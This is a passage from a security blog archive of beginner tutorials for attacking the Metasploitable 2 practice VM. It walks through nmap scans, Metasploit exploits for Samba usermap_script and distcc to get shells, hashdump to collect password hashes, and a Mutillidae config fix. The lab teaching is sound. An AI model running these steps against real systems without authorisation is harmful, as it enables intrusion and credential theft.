<span style="font-family: "trebuchet ms" , sans-serif;">It is important to be familiar with the SQL syntax. <a href="https://www.tutorialspoint.com/sql/index.htm" target="_blank">tutorialspoint</a> is a great resource for quickly getting on your feet with SQL. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">You can measure your SQL skills by answering this question - Why did it show us all of the username and passwords? Why not a couple of them or just one of them?</span><br />
<br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">-<i>Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span>Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-51493206143149159912016-10-14T02:43:00.001-07:002016-10-14T02:43:41.497-07:00Metasploitable 2 & Mutillidae 2.1.19: Correcting Database Errors<span style="font-family: Trebuchet MS, sans-serif;">Metasploitable 2 comes with <a href="https://sourceforge.net/projects/mutillidae/" target="_blank">Mutillidae 2.1.19</a> preinstalled. Mutillidae is a free web application penetration testing practice application. </span><div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Trebuchet MS, sans-serif;">However, when you try to practice your attacks on Mutillidae, you will be greeted with database errors. </span></div>
<div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Trebuchet MS, sans-serif;">Here's how to fix the database.</span></div>
<div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Trebuchet MS, sans-serif;">Login to your metasploitable 2 machine</span></div>
<div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: cd /var/www/mutillidae</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">Then enter the command: sudo nano config.inc</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-unJ_XG1vjZM/WACobW48n8I/AAAAAAAACsM/DqRK1QDHxLsfMdQExlhfVQes34ZHIgo5QCEw/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="33" src="https://2.bp.blogspot.com/-unJ_XG1vjZM/WACobW48n8I/AAAAAAAACsM/DqRK1QDHxLsfMdQExlhfVQes34ZHIgo5QCEw/s400/1.PNG" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">You should then see the following on your screen</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-dOQw9xhbspo/WACobRAhs9I/AAAAAAAACsQ/WJordhUczIQ1TJKSyTcql3sGpvscIyx3QCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="102" src="https://4.bp.blogspot.com/-dOQw9xhbspo/WACobRAhs9I/AAAAAAAACsQ/WJordhUczIQ1TJKSyTcql3sGpvscIyx3QCEw/s400/2.PNG" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">move your cursor using your keyboard's arrow keys and change the dbname to "owasp10" as shown below</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-9ufNtdrwZc4/WACobTPc50I/AAAAAAAACsU/ZWw5A5nPpNM3kg66UyXCBt1AsXxjCCHswCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="97" src="https://2.bp.blogspot.com/-9ufNtdrwZc4/WACobTPc50I/AAAAAAAACsU/ZWw5A5nPpNM3kg66UyXCBt1AsXxjCCHswCEw/s400/3.PNG" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">now hit "ctrl+x", then "Y" to confirm save changes and then "enter".</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">Once your back on the console, enter the command: sudo /etc/init.d/apache2 reload</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-CwK5JUNFf68/WACob_L38AI/AAAAAAAACsY/5-5jSzZa46w1KLOUZhquS-5sYgOOZM08gCEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="16" src="https://4.bp.blogspot.com/-CwK5JUNFf68/WACob_L38AI/AAAAAAAACsY/5-5jSzZa46w1KLOUZhquS-5sYgOOZM08gCEw/s400/4.PNG" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">On your kali machine, enter the address <<metasploitable 2's machines IP address>>/mutillidae</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-T08-zvN_S9o/WACob5wwXsI/AAAAAAAACsc/BIGX1FaokToeSiWKa8RHYR-lPfaYj5XMACEw/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="103" src="https://4.bp.blogspot.com/-T08-zvN_S9o/WACob5wwXsI/AAAAAAAACsc/BIGX1FaokToeSiWKa8RHYR-lPfaYj5XMACEw/s400/5.PNG" width="400" /></a></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">And click on "Reset DB" and you are good to go. </span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">-<i>Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-74172049675601581582016-10-13T02:23:00.000-07:002016-10-13T02:23:26.588-07:00Pwning Metasploitable 2: Post Exploitation - Dumping Password Hashes<span style="font-family: Trebuchet MS, sans-serif;">From our previous exploitation articles we have successfully opened up sessions with our target machines. With open sessions you can do whatever you want on the target machine with the right tools. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Ill have to admit- we have been skipping a few details during exploitation. While using the exploits, we can also set <a href="https://www.offensive-security.com/metasploit-unleashed/payloads/" target="_blank">payloads</a>. Think of payloads as an extra set of tools that you go in with that will help you do more stuff. We will show you how to use payloads in later articles.</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.pentest-standard.org/index.php/Post_Exploitation" target="_blank">Post exploitation</a> is the next step after breaking into the target machine. Lets look at a post exploitation example where we will dump all the password hashes of users on the target system. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">Get an open session </span></h3>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Follow any of our previous exploitation articles to help you get an open session with the target machine. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">Post exploitation </span></h3>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Hit ctrl+Z to put the session into background. Enter Y when prompted. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-0xTG45xevtw/V_9IvK_LOqI/AAAAAAAACsA/UxLy_tvzdLAPMmt48sd0BtuKRKTfliTlACEw/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="33" src="https://3.bp.blogspot.com/-0xTG45xevtw/V_9IvK_LOqI/AAAAAAAACsA/UxLy_tvzdLAPMmt48sd0BtuKRKTfliTlACEw/s400/6.PNG" width="400" /></span></a></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">With this command, the session is still open however it is put on the background so as to allow you to use msfconsole. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">You can have multiple open sessions in the background. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Check your sessions using the command: sessions</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-snyjo5Qh4z0/V_9IvIWbyII/AAAAAAAACsA/-8UKbo5H8zQCYQTonPr2pt_a-03GxVm2wCEw/s1600/7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="102" src="https://2.bp.blogspot.com/-snyjo5Qh4z0/V_9IvIWbyII/AAAAAAAACsA/-8UKbo5H8zQCYQTonPr2pt_a-03GxVm2wCEw/s400/7.PNG" width="400" /></span></a></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: use post/linux/gather/hashdump</span><br />
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: show options</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">This command selects the hashdump script. Metasploit stores all its post exploitation scripts in the "post" folder. We will go through other scripts in later articles. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-VLYIB5th9tU/V_9IvSTXQsI/AAAAAAAACsA/4c2MAgw2n64EQWnCz8zfB61sx1ww3nbcwCEw/s1600/8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="101" src="https://2.bp.blogspot.com/-VLYIB5th9tU/V_9IvSTXQsI/AAAAAAAACsA/4c2MAgw2n64EQWnCz8zfB61sx1ww3nbcwCEw/s400/8.PNG" width="400" /></span></a></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Normally we set the RHOST on exploits to give them a target. However on post exploitation scripts in metasploit we give it a session. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: set SESSION 1</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">The "1" in the command simple corresponds to the 'session 'id' you want the script to run on. You can view your sessions by the "sessions" command shown above. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-rrPKt-nAPow/V_9IvcO0scI/AAAAAAAACsA/TQQ4FCEOknE0sisIT6oALcGp0-Q4Z91WQCEw/s1600/9.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="38" src="https://2.bp.blogspot.com/-rrPKt-nAPow/V_9IvcO0scI/AAAAAAAACsA/TQQ4FCEOknE0sisIT6oALcGp0-Q4Z91WQCEw/s400/9.PNG" width="400" /></span></a></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">...and exploit. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-JCAnwTru8X8/V_9IuH2ST1I/AAAAAAAACsA/ZLiQxqGh2cQUjFozchVwZf3qkfe1XFRwwCEw/s1600/10.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="170" src="https://2.bp.blogspot.com/-JCAnwTru8X8/V_9IuH2ST1I/AAAAAAAACsA/ZLiQxqGh2cQUjFozchVwZf3qkfe1XFRwwCEw/s400/10.PNG" width="400" /></span></a></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">What you see on your screen are passwords... in <a href="https://en.wikipedia.org/wiki/Cryptographic_hash_function" target="_blank">hash</a> format. Hashed passwords are then cracked using password cracking techniques or tools to retrieve plain text passwords which we can then use on login fields. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">-<i>Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span>Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-45959116719862262192016-10-13T01:43:00.000-07:002016-10-13T01:43:54.300-07:00Pwning Metasploitable 2: Exploiting Samba smbd 3.X <span style="font-family: Trebuchet MS, sans-serif;">Lets look at port 139 on our <a href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/" target="_blank">Metasploitable 2 machine</a>. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">Discovering the port status and service</span></h3>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: nmap -sV -p 139 <<target IP address>></span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-tQl4CEkQugs/V_9It_QhVMI/AAAAAAAACrY/ccFRnfeXY9MawedjUK3oakf2C6AYNLAvACEw/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="https://4.bp.blogspot.com/-tQl4CEkQugs/V_9It_QhVMI/AAAAAAAACrY/ccFRnfeXY9MawedjUK3oakf2C6AYNLAvACEw/s400/1.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">From the nmap results, we see that the port is open with Samba 3.X running on it. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><a href="https://www.samba.org/" target="_blank">Samba</a> is a freeware that allows users to access and read files, access printers and other resources over the network. It is based on the <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa365233(v=vs.85).aspx" target="_blank">Server Message Block (SMB) protocol</a>. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">Exploiting Samba</span></h3>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Start up your Metasploit framework using the command "msfconsole"</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Search for Samba exploits with: search samba</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-5vqlP3iaJIQ/V_9IuBQGPRI/AAAAAAAACrg/P_gEwrpMO_gTKB9nxZ7En5Cabtr0hrlxQCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="https://4.bp.blogspot.com/-5vqlP3iaJIQ/V_9IuBQGPRI/AAAAAAAACrg/P_gEwrpMO_gTKB9nxZ7En5Cabtr0hrlxQCEw/s400/2.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">There are many exploits for samba. <a href="https://www.samba.org/samba/security/CVE-2007-2447.html" target="_blank">Only 1 fits our needs</a>. You can try out different exploits and see the results. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: use exploit/multi/samba/usermap_script</span><br />
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: show options</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-oSKKiJWbXnI/V_9IupPjQWI/AAAAAAAACro/NW_NnbbvTf4H6OPmt7VI1EhISezb5ecjgCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="163" src="https://4.bp.blogspot.com/-oSKKiJWbXnI/V_9IupPjQWI/AAAAAAAACro/NW_NnbbvTf4H6OPmt7VI1EhISezb5ecjgCEw/s400/3.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">RHOST field is empty. Lets give it the exploit a target.</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: set RHOST <<target IP address>></span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-u3TACCzXpSo/V_9IuseDHPI/AAAAAAAACrk/vsoTEYArqpscFJL1mIzoEKLnG_vhWBK4QCEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="33" src="https://3.bp.blogspot.com/-u3TACCzXpSo/V_9IuseDHPI/AAAAAAAACrk/vsoTEYArqpscFJL1mIzoEKLnG_vhWBK4QCEw/s400/4.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">and lastly, enter the command: exploit</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-Rq9vUpWFcUQ/V_9Iu65hMCI/AAAAAAAACrs/PDpQHtzXvcMFEXegGUzVdm8GoA_9NvAVACEw/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://2.bp.blogspot.com/-Rq9vUpWFcUQ/V_9Iu65hMCI/AAAAAAAACrs/PDpQHtzXvcMFEXegGUzVdm8GoA_9NvAVACEw/s400/5.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Exploited successfully. We have our shell :)</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<br />
<span style="font-family: Trebuchet MS, sans-serif;">Together with our previous articles, we have gotten multiple shells through vulnerable services. In our next article we will look at post-exploitation. The next step after getting a shell. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>) </span>Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-65358384136346337542016-10-12T02:36:00.001-07:002016-10-12T03:23:58.152-07:00Pwning Metasploitable 2: Exploiting distcc v1 (GNU) 4.2.4<span style="font-family: "trebuchet ms" , sans-serif;">Lets look at port 3632.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/" target="_blank">Metasploitable 2</a> is running <a href="https://github.com/distcc/distcc" target="_blank">distcc</a>. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">distcc is a program that is used to distribute compilation of code across machines on a network taking advantage of unused processing power of other computers. Machines on the network need to have distccd daemon and compatible compiler installed. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Scanning port 3632</span></h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: nmap -sV -p 3632 <<target IP address>></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-5B-Vx3slMHc/V_3_lRUZwAI/AAAAAAAACqw/9wM3_AAMTP832ZiFrfrSWtBufr3C-3xZwCLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="121" src="https://4.bp.blogspot.com/-5B-Vx3slMHc/V_3_lRUZwAI/AAAAAAAACqw/9wM3_AAMTP832ZiFrfrSWtBufr3C-3xZwCLcB/s400/1.PNG" width="400" /></a></div>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;">Nmap scan shows that distccd v1 is running on port 3632.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Searching for exploit in msfconsole</span></h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Start up your msfconsole and search for a distcc exploit. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: search distcc</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-273cQgxnkkA/V_3_liFAwhI/AAAAAAAACrA/N2VmOv3WPbgPMsmT_ZPXQ28SVg6DSY7XQCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="https://3.bp.blogspot.com/-273cQgxnkkA/V_3_liFAwhI/AAAAAAAACrA/N2VmOv3WPbgPMsmT_ZPXQ28SVg6DSY7XQCEw/s320/2.PNG" width="320" /></a></div>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">There is an <a href="https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec" target="_blank">exploit available for distcc</a>. More references <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687" target="_blank">here</a> and <a href="https://www.exploit-db.com/exploits/9915/" target="_blank">here</a>.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Exploiting distcc using distcc_exec exploit</span></h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Lets use the exploit by giving the command: use exploit/unix/misc/distcc_exec</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-nCK4bnBPVHQ/V_3_lugQrSI/AAAAAAAACrA/ToXHNNQEPAE05zNz_PE9YfRY5lUFc-M_gCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://4.bp.blogspot.com/-nCK4bnBPVHQ/V_3_lugQrSI/AAAAAAAACrA/ToXHNNQEPAE05zNz_PE9YfRY5lUFc-M_gCEw/s400/3.PNG" width="400" /></a></div>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">As usual, we need to give the exploit a target. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: set RHOST <<target IP address>></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-q8sPsri-0hU/V_3_mIsJwTI/AAAAAAAACrA/b9eNroR4Wd4iKftSBQYENaXRQnmI-0BgACEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="33" src="https://3.bp.blogspot.com/-q8sPsri-0hU/V_3_mIsJwTI/AAAAAAAACrA/b9eNroR4Wd4iKftSBQYENaXRQnmI-0BgACEw/s400/4.PNG" width="400" /></a></div>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">...and exploit :)</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-lwIi7YMaKXQ/V_3_mRbEj3I/AAAAAAAACrA/W7vB6MZa4H0Lkr5cANjgq8podFEgwCHCgCEw/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://4.bp.blogspot.com/-lwIi7YMaKXQ/V_3_mRbEj3I/AAAAAAAACrA/W7vB6MZa4H0Lkr5cANjgq8podFEgwCHCgCEw/s400/5.PNG" width="400" /></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Exploit was successful as a command shell session was opened.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">However, unlike other time where we got "root" as our id, here we got daemon as the id. that means we compromised the target with daemon rights. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">A <a href="http://www.linfo.org/daemon.html" target="_blank">daemon</a> is a program that runs a background process. It cant do nearly as much as a root. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Good news is that we have <a href="https://en.wikipedia.org/wiki/Privilege_escalation" target="_blank">privilege escalation</a>. It bumps the privilege level to root by exploiting bugs in the code. We will use privilege escalation soon to bump our access level from daemon to root. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">-<i>Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span>Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-87797605505931340652016-10-12T00:55:00.000-07:002016-10-12T03:23:27.063-07:00Pwning Metasploitable 2: Exploiting Malicious Backdoor on UnrealIRCD 3.2.8.1<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Let’s look at port 6667.</span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><a href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/" target="_blank">Metasploitable 2</a> is running an <a href="https://www.unrealircd.org/" target="_blank">UnrealIRCD server</a>.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><b>Challenge: </b><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Nmap doesn’t show you the version of the Unreal ircd.
Another way to find out the version of the <a href="https://en.wikipedia.org/wiki/Internet_Relay_Chat" target="_blank">IRC server</a> is to connect to it using
an IRC client. There are many clients to choose from, however for starters look at “<a href="https://hexchat.github.io/" target="_blank">HexChat</a>”.</span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
